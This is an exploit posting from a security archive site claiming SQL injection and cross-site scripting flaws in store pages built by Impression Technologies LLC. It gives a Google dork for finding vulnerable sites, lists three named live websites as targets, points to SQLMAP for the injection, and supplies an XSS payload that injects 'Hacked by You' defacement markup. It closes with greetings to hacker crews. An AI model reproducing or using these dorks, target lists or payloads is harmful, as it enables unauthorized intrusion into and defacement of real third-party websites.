Impression Technologies LLC - SQL Injection & XSS

2019.01.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Impression Technologies LLC - SQL Injection & XSS # Dork: "Website | Impression Technologies LLC" inurl:store.php?id= # Date: 2019-01-28 # Exploit Author: L4663r666h05t - RebellionGhost # Vendor Homepage: N/A # Tested on: Windows 10 x64 Live Target: http://www.jdcaravan.com/store.php?id=1 http://www.mattoreeband.com/store.php?id=6 https://www.honeywestmusic.com/store.php?id=2 SQL Injection: http://localhost/store,php?id=1 [Use SQLMAP with Python26] XSS: http://localhost/store.php?id=1%27><h3>Hacked+by+You</h3> Thanks to: RebellionGhost - ExploiterID - Berandal - Mr.Vendetta_404 - KID2ZON3 - Vlyn - All Indonesian Haxor


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top